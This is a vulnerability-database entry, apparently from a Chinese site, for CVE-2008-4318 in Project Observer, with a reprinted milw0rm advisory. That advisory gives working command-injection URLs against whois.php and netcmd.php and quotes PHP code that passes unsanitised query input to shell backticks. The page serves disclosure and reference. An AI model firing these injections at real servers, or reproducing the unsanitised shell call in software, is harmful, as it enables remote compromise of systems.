Project Observer 执行任意指令漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116202 漏洞类型 输入验证
发布时间 2008-09-24 更新时间 2008-09-29
CVE编号 CVE-2008-4318 CNNVD-ID CNNVD-200809-407
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/6559
https://www.securityfocus.com/bid/84763
https://cxsecurity.com/issue/WLB-2008100090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-407
|漏洞详情
ProjectObserver是一个基于PHP/MySQL/SNMP/CDP的网络管理系统。Observer0.3.2.1及其早期版本允许远程攻击者通过对(1)whois.php或(2)netcmd.php的查询参数中的SHELL元字符,以执行任意指令。
|漏洞EXP
:::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #########################################################
 #  [ observer <= 0.3.2.1 ]   Remote Command Execution   #
 #########################################################
 #
 # Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks."
 #
 # Script site: http://www.project-observer.org/
 # Download: http://freshmeat.net/projects/observer/
 #
 # Vuln: 
 # (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a
 # (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a    
 #
 #
 # Bug(1): ./observer-0.3.2.1/html/whois.php
 #
 # ...
 # 	$output = `/usr/bin/whois $_GET[query] | grep -v \%`;
 #	$output = trim($output);
 #	echo("<pre>$output</pre>");
 # ... 	 
 #
 #
 # Bug(2): ./observer-0.3.2.1/html/netcmd.php
 #
 # ...
 #  switch ($_GET[cmd]) {
 #   case 'whois':
 #     $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
 #     break;
 #   case 'ping':
 #     $output = `/bin/ping $_GET[query]`;
 #     break;
 #   case 'tracert':
 #     $output = `/usr/sbin/traceroute $_GET[query]`;
 #     break;
 #   case 'nmap':
 #     $output = `/usr/bin/nmap $_GET[query]`;
 #     break;
 #  }
 #  $output = trim($output);
 #  echo("<pre>$output</pre>");
 # ... 			    		    
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-24]
|受影响的产品
Project-Observer Observer 0.3.2 .1 Project-Observer Observer 0.3.2 Project-Observer Observer 0.2.4 Project-Observer Observer 0.2.4 Project-Observer Observer 0.2.3 Project-
|参考资料

来源:XF
名称:observer-whois-netcmd-command-execution(45398)
链接:http://xforce.iss.net/xforce/xfdb/45398
来源:MILW0RM
名称:6559
链接:http://www.milw0rm.com/exploits/6559
来源:SREASON
名称:4322
链接:http://securityreason.com/securityalert/4322